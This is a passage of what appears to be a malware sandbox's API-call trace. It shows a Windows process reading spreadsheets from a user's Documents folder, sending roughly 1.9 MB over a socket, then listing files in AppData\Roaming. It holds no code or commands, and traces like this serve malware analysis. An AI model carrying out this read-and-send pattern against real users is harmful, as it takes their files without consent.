CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\zO0R7X8yiTCHz9z6m9mt.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\zo0r7x8yitchz9z6m9mt.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.438] GetFileType (hFile=0x354) returned 0x1 [0217.438] GetFileType (hFile=0x354) returned 0x1 [0217.439] ReadFile (in: hFile=0x354, lpBuffer=0x2811554, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2811554*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.440] ReadFile (in: hFile=0x354, lpBuffer=0x2811554, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2811554*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.440] ReadFile (in: hFile=0x354, lpBuffer=0x2811554, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2811554*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.441] ReadFile (in: hFile=0x354, lpBuffer=0x2811554, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2811554*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.441] ReadFile (in: hFile=0x354, lpBuffer=0x2811554, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2811554*, lpNumberOfBytesRead=0x36f214*=0x44b, lpOverlapped=0x0) returned 1 [0217.441] ReadFile (in: hFile=0x354, lpBuffer=0x2810933, nNumberOfBytesToRead=0x3b5, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2810933*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.442] ReadFile (in: hFile=0x354, lpBuffer=0x2811554, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2811554*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0217.443] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gZN4L.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gzn4l.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.443] GetFileType (hFile=0x354) returned 0x1 [0217.443] GetFileType (hFile=0x354) returned 0x1 [0217.443] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.444] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.444] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.444] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.445] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.445] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.445] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.446] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.446] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.446] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.447] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.447] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.447] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.447] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.448] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.448] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.448] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.448] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.449] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.449] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.449] ReadFile (in: hFile=0x354, lpBuffer=0x282c2f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x282c2f8*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.550] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0xf1822115, Data2=0x8f44, Data3=0x48a3, Data4=([0]=0x95, [1]=0xaf, [2]=0xcd, [3]=0x85, [4]=0xdf, [5]=0xe6, [6]=0x81, [7]=0x2))) returned 0x0 [0217.550] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0xedfd891e, Data2=0x80a8, Data3=0x4e4b, Data4=([0]=0xa8, [1]=0x41, [2]=0xd5, [3]=0xd5, [4]=0xac, [5]=0xb4, [6]=0x29, [7]=0x7c))) returned 0x0 [0217.582] send (s=0x264, buf=0x3740136*, len=65536, flags=0) returned 65536 [0217.583] send (s=0x264, buf=0x3750136*, len=65536, flags=0) returned 65536 [0217.823] send (s=0x264, buf=0x3760136*, len=65536, flags=0) returned 65536 [0217.880] send (s=0x264, buf=0x3770136*, len=65536, flags=0) returned 65536 [0218.118] send (s=0x264, buf=0x3780136*, len=65536, flags=0) returned 65536 [0218.172] send (s=0x264, buf=0x3790136*, len=65536, flags=0) returned 65536 [0218.388] send (s=0x264, buf=0x37a0136*, len=65536, flags=0) returned 65536 [0218.449] send (s=0x264, buf=0x37b0136*, len=65536, flags=0) returned 65536 [0218.666] send (s=0x264, buf=0x37c0136*, len=65536, flags=0) returned 65536 [0218.727] send (s=0x264, buf=0x37d0136*, len=65536, flags=0) returned 65536 [0218.788] send (s=0x264, buf=0x37e0136*, len=65536, flags=0) returned 65536 [0219.012] send (s=0x264, buf=0x37f0136*, len=65536, flags=0) returned 65536 [0219.074] send (s=0x264, buf=0x3800136*, len=65536, flags=0) returned 65536 [0219.293] send (s=0x264, buf=0x3810136*, len=65536, flags=0) returned 65536 [0219.362] send (s=0x264, buf=0x3820136*, len=65536, flags=0) returned 65536 [0219.420] send (s=0x264, buf=0x3830136*, len=65536, flags=0) returned 65536 [0219.636] send (s=0x264, buf=0x3840136*, len=65536, flags=0) returned 65536 [0219.698] send (s=0x264, buf=0x3850136*, len=65536, flags=0) returned 65536 [0219.753] send (s=0x264, buf=0x3860136*, len=65536, flags=0) returned 65536 [0219.996] send (s=0x264, buf=0x3870136*, len=65536, flags=0) returned 65536 [0220.060] send (s=0x264, buf=0x3880136*, len=65536, flags=0) returned 65536 [0220.120] send (s=0x264, buf=0x3890136*, len=65536, flags=0) returned 65536 [0220.355] send (s=0x264, buf=0x38a0136*, len=65536, flags=0) returned 65536 [0220.425] send (s=0x264, buf=0x38b0136*, len=65536, flags=0) returned 65536 [0220.484] send (s=0x264, buf=0x38c0136*, len=65536, flags=0) returned 65536 [0220.720] send (s=0x264, buf=0x38d0136*, len=65536, flags=0) returned 65536 [0220.780] send (s=0x264, buf=0x38e0136*, len=65536, flags=0) returned 65536 [0220.840] send (s=0x264, buf=0x38f0136*, len=65536, flags=0) returned 65536 [0220.904] send (s=0x264, buf=0x3900136*, len=65536, flags=0) returned 65536 [0221.135] send (s=0x264, buf=0x3910136*, len=27000, flags=0) returned 27000 [0221.213] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 132 [0221.396] CoTaskMemAlloc (cb=0x20c) returned 0x796e90 [0221.396] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x796e90 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0221.396] CoTaskMemFree (pv=0x796e90) [0221.396] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x36ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0221.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1b4) returned 1 [0221.396] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x36ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0221.397] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\*", lpFindFileData=0x36ef64 | out: lpFindFileData=0x36ef64*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d6fa4d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x7d6fa4d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.397] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d6fa4d0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0x7d6fa4d0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.397] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb6b3a50, ftCreationTime.dwHighDateTime=0x1d7e639, ftLastAccessTime.dwLowDateTime=0x5d275830, ftLastAccessTime.dwHighDateTime=0x1d7e6ce, ftLastWriteTime.dwLowDateTime=0x5d275830, ftLastWriteTime.dwHighDateTime=0x1d7e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x2bda, dwReserved0=0x0, dwReserved1=0x0, cFileName="2JBXKXbzpzi2z1.gif", cAlternateFileName="2JBXKX~1.GIF")) returned 1 [0221.397] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf5c1e8c0, ftCreationTime.dwHighDateTime=0x1d7df2c, ftLastAccessTime.dwLowDateTime=0x94fe4480, ftLastAccessTime.dwHighDateTime=0x1d7e00c, ftLastWriteTime.dwLowDateTime=0x94fe4480, ftLastWriteTime.dwHighDateTime=0x1d7e00c, nFileSizeHigh=0x0, nFileSizeLow=0xe772, dwReserved0=0x0, dwReserved1=0x0, cFileName="4Fo1H.docx", cAlternateFileName="4FO1H~1.DOC")) returned 1 [0221.397] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6a3b380, ftCreationTime.dwHighDateTime=0x1d7e0a9, ftLastAccessTime.dwLowDateTime=0x7ae062a0, ftLastAccessTime.dwHighDateTime=0x1d7e330, ftLastWriteTime.dwLowDateTime=0x7ae062a0, ftLastWriteTime.dwHighDateTime=0x1d7e330, nFileSizeHigh=0x0, nFileSizeLow=0x7e8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="4j-mehx2etn3_gP7T.m4a", cAlternateFileName="4J-MEH~1.M4A")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf6e310a0, ftCreationTime.dwHighDateTime=0x1d7d9d0, ftLastAccessTime.dwLowDateTime=0x7c63e20, ftLastAccessTime.dwHighDateTime=0x1d7e11e, ftLastWriteTime.dwLowDateTime=0x7c63e20, ftLastWriteTime.dwHighDateTime=0x1d7e11e, nFileSizeHigh=0x0, nFileSizeLow=0x164a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="5WUi3DQ8jt5WJo6Z.flv", cAlternateFileName="5WUI3D~1.FLV")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88130720, ftCreationTime.dwHighDateTime=0x1d7db1a, ftLastAccessTime.dwLowDateTime=0x887b7ab0, ftLastAccessTime.dwHighDateTime=0x1d7e161, ftLastWriteTime.dwLowDateTime=0x887b7ab0, ftLastWriteTime.dwHighDateTime=0x1d7e161, nFileSizeHigh=0x0, nFileSizeLow=0x14565, dwReserved0=0x0, dwReserved1=0x0, cFileName="5_xgfJ r X UDgiAP.swf", cAlternateFileName="5_XGFJ~1.SWF")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c41d4f0, ftCreationTime.dwHighDateTime=0x1d7d889, ftLastAccessTime.dwLowDateTime=0xd61dcba0, ftLastAccessTime.dwHighDateTime=0x1d7db81, ftLastWriteTime.dwLowDateTime=0xd61dcba0, ftLastWriteTime.dwHighDateTime=0x1d7db81, nFileSizeHigh=0x0, nFileSizeLow=0x4103, dwReserved0=0x0, dwReserved1=0x0, cFileName="bC7Ph.m4a", cAlternateFileName="")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5619dc0, ftCreationTime.dwHighDateTime=0x1d7defb, ftLastAccessTime.dwLowDateTime=0xce754000, ftLastAccessTime.dwHighDateTime=0x1d7df4f, ftLastWriteTime.dwLowDateTime=0xce754000, ftLastWriteTime.dwHighDateTime=0x1d7df4f, nFileSizeHigh=0x0, nFileSizeLow=0xccf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="bhXqM96W26wm2r.png", cAlternateFileName="BHXQM9~1.PNG")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x52e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cdieedr", cAlternateFileName="")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf60d8670, ftCreationTime.dwHighDateTime=0x1d7d786, ftLastAccessTime.dwLowDateTime=0xb9eabc10, ftLastAccessTime.dwHighDateTime=0x1d7ddfa, ftLastWriteTime.dwLowDateTime=0xb9eabc10, ftLastWriteTime.dwHighDateTime=0x1d7ddfa, nFileSizeHigh=0x0, nFileSizeLow=0xf0e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CJychnsBx.jpg", cAlternateFileName="CJYCHN~1.JPG")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb8c76e90, ftCreationTime.dwHighDateTime=0x1d7e549, ftLastAccessTime.dwLowDateTime=0xad484560, ftLastAccessTime.dwHighDateTime=0x1d7e6db, ftLastWriteTime.dwLowDateTime=0xad484560, ftLastWriteTime.dwHighDateTime=0x1d7e6db, nFileSizeHigh=0x0, nFileSizeLow=0x702a, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9fRetS7.m4a", cAlternateFileName="")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc961740, ftCreationTime.dwHighDateTime=0x1d7d748, ftLastAccessTime.dwLowDateTime=0x61010d50, ftLastAccessTime.dwHighDateTime=0x1d7dfe6, ftLastWriteTime.dwLowDateTime=0x61010d50, ftLastWriteTime.dwHighDateTime=0x1d7dfe6, nFileSizeHigh=0x0, nFileSizeLow=0x76d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DdNPdWunmd0ldf.flv", cAlternateFileName="DDNPDW~1.FLV")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b55cb40, ftCreationTime.dwHighDateTime=0x1d7daa7, ftLastAccessTime.dwLowDateTime=0xcf5b25d0, ftLastAccessTime.dwHighDateTime=0x1d7dd23, ftLastWriteTime.dwLowDateTime=0xcf5b25d0, ftLastWriteTime.dwHighDateTime=0x1d7dd23, nFileSizeHigh=0x0, nFileSizeLow=0x13ae4, dwReserved0=0x0, dwReserved1=0x0, cFileName="fl2WBO_u7ZegJ9rV.jpg", cAlternateFileName="FL2WBO~1.JPG")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfddac9a0, ftCreationTime.dwHighDateTime=0x1d7df54, ftLastAccessTime.dwLowDateTime=0xda25b0d0, ftLastAccessTime.dwHighDateTime=0x1d7e71d, ftLastWriteTime.dwLowDateTime=0xda25b0d0, ftLastWriteTime.dwHighDateTime=0x1d7e71d, nFileSizeHigh=0x0, nFileSizeLow=0x58d, dwReserved0=0x0, dwReserved1=0x0, cFileName="HVls-SkKX2dp.wav", cAlternateFileName="HVLS-S~1.WAV")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e8507b0, ftCreationTime.dwHighDateTime=0x1d7dfd5, ftLastAccessTime.dwLowDateTime=0x5e8f80b0, ftLastAccessTime.dwHighDateTime=0x1d7e15d, ftLastWriteTime.dwLowDateTime=0x5e8f80b0, ftLastWriteTime.dwHighDateTime=0x1d7e15d, nFileSizeHigh=0x0, nFileSizeLow=0x18b0d, dwReserved0=0x0, dwReserved1=0x0, cFileName="iJEQEgTpQka_aXz4a.m4a", cAlternateFileName="IJEQEG~1.M4A")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6f2abd00, ftCreationTime.dwHighDateTime=0x1d7e3fa, ftLastAccessTime.dwLowDateTime=0x94b5b030, ftLastAccessTime.dwHighDateTime=0x1d7e656, ftLastWriteTime.dwLowDateTime=0x94b5b030, ftLastWriteTime.dwHighDateTime=0x1d7e656, nFileSizeHigh=0x0, nFileSizeLow=0xb291, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlSy7LD3myZfaILtxw.avi", cAlternateFileName="LLSY7L~1.AVI")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a80900, ftCreationTime.dwHighDateTime=0x1d7e04f, ftLastAccessTime.dwLowDateTime=0xfba42e60, ftLastAccessTime.dwHighDateTime=0x1d7e495, ftLastWriteTime.dwLowDateTime=0xfba42e60, ftLastWriteTime.dwHighDateTime=0x1d7e495, nFileSizeHigh=0x0, nFileSizeLow=0x97cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MDfVmG5dBCZ.m4a", cAlternateFileName="MDFVMG~1.M4A")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0221.398] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2afca50, ftCreationTime.dwHighDateTime=0x1d7e3e7, ftLastAccessTime.dwLowDateTime=0x478946a0, ftLastAccessTime.dwHighDateTime=0x1d7e4a3, ftLastWriteTime.dwLowDateTime=0x478946a0, ftLastWriteTime.dwHighDateTime=0x1d7e4a3, nFileSizeHigh=0x0, nFileSizeLow=0x108fa, dwReserved0=0x0, dwReserved1=0x0, cFileName="MOIQ1bwkUxFX.mkv", cAlternateFileName="MOIQ1B~1.MKV")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ac81950, ftCreationTime.dwHighDateTime=0x1d7ddf8, ftLastAccessTime.dwLowDateTime=0xbf553e70, ftLastAccessTime.dwHighDateTime=0x1d7e307, ftLastWriteTime.dwLowDateTime=0xbf553e70, ftLastWriteTime.dwHighDateTime=0x1d7e307, nFileSizeHigh=0x0, nFileSizeLow=0x629f, dwReserved0=0x0, dwReserved1=0x0, cFileName="n4fA6s.bmp", cAlternateFileName="")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x509eae50, ftCreationTime.dwHighDateTime=0x1d7db67, ftLastAccessTime.dwLowDateTime=0xa9605dc0, ftLastAccessTime.dwHighDateTime=0x1d7ddd0, ftLastWriteTime.dwLowDateTime=0xa9605dc0, ftLastWriteTime.dwHighDateTime=0x1d7ddd0, nFileSizeHigh=0x0, nFileSizeLow=0xd927, dwReserved0=0x0, dwReserved1=0x0, cFileName="N4n GkWyf2.png", cAlternateFileName="N4NGKW~1.PNG")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x920f63b0, ftCreationTime.dwHighDateTime=0x1d7e306, ftLastAccessTime.dwLowDateTime=0x8b90cc90, ftLastAccessTime.dwHighDateTime=0x1d7e478, ftLastWriteTime.dwLowDateTime=0x8b90cc90, ftLastWriteTime.dwHighDateTime=0x1d7e478, nFileSizeHigh=0x0, nFileSizeLow=0x20d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="P2GSu-8Bu5giDHNCL.jpg", cAlternateFileName="P2GSU-~1.JPG")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dcab500, ftCreationTime.dwHighDateTime=0x1d7df10, ftLastAccessTime.dwLowDateTime=0x71aa8960, ftLastAccessTime.dwHighDateTime=0x1d7e784, ftLastWriteTime.dwLowDateTime=0x71aa8960, ftLastWriteTime.dwHighDateTime=0x1d7e784, nFileSizeHigh=0x0, nFileSizeLow=0x7b66, dwReserved0=0x0, dwReserved1=0x0, cFileName="pInSHusqc lETSp5.png", cAlternateFileName="PINSHU~1.PNG")) 